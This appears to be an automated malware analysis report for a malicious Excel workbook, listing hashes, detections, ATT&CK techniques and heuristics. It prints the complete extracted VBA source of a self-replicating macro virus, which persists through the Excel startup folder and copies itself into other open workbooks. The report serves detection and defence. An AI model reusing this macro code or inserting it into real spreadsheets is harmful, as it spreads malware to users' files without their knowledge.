Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 a4e6e778740f35ad…

MALICIOUS

Office (OOXML)

Size: 236.3 KB
Created: 2009-11-18 14:45:47 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2021-05-23
MD5: 0f1a31bc1756991cc6a8c7fe42ed38e0
SHA-1: d1f7b1603618e4b77094eb3d3bb3c65d14bc8835
SHA-256: a4e6e778740f35adf06e8771b945f016d9f66d33207f588c72a9ff7134727e19
Risk Score: 188

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

The sample is an Excel document containing VBA macros, specifically an Auto_Open macro. When the workbook is not already running from the Excel startup directory (XLSTART, resolved through Application.StartupPath), the macro saves a copy of itself there as 'mypersonnel.xls'. This establishes persistence: Excel loads every workbook in XLSTART at launch, so the macro runs each time Microsoft Excel is started. The document body appears to be a legitimate project deployment schedule, likely used as a lure.

Heuristics (4)

  • ClamAV: Xls.Virus.Valyria-10004391-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Virus.Valyria-10004391-0
  • VBA project inside OOXML (medium, 1 related finding, OOXML_VBA)
    Document contains a VBA project; VBA macros are present
  • Auto_Open macro (high, OLE_VBA_AUTO)
    The VBA project contains an Auto_Open procedure, which runs automatically when the workbook is opened with macros enabled
  • Hidden worksheet (veryHidden) (low, OOXML_HIDDEN_SHEET)
    Excel workbook contains 1 hidden sheet(s); hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1304 bytes
SHA-256: 3521c9120c3d6f6198577135f38f2fd19b399dd53636d28342651a276b50413f
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Kangatang"

Sub Auto_Open()
'If ThisWorkbook.Path <> Application.Path & "\XLSTART" Then ThisWorkbook.SaveAs Filename:=Application.Path & "\XLSTART\mypersonel.xls"
Application.DisplayAlerts = False
On Error Resume Next
If ThisWorkbook.Path <> Application.StartupPath Then
    Application.ScreenUpdating = False
    Windows(1).Visible = False
    ThisWorkbook.SaveCopyAs Filename:=Application.StartupPath & "\mypersonnel.xls"
    Windows(1).Visible = True
End If

    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "mypersonnel.xls!allocated"
End Sub

Sub allocated()
  On Error Resume Next
  If ActiveWorkbook.Sheets(1).Name <> "Kangatang" Then
    Application.ScreenUpdating = False
    currentsh = ActiveSheet.Name
    ThisWorkbook.Sheets("Kangatang").Copy before:=ActiveWorkbook.Sheets(1)
    ActiveWorkbook.Sheets(currentsh).Select
    Application.ScreenUpdating = True
  End If
End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 17408 bytes
SHA-256: f4464192d111fa7812a3038544056963ed8c051b6936bfb83944e7c0f003fa21
Detection
ClamAV: Xls.Virus.Valyria-10004391-0
Obfuscation or payload: unlikely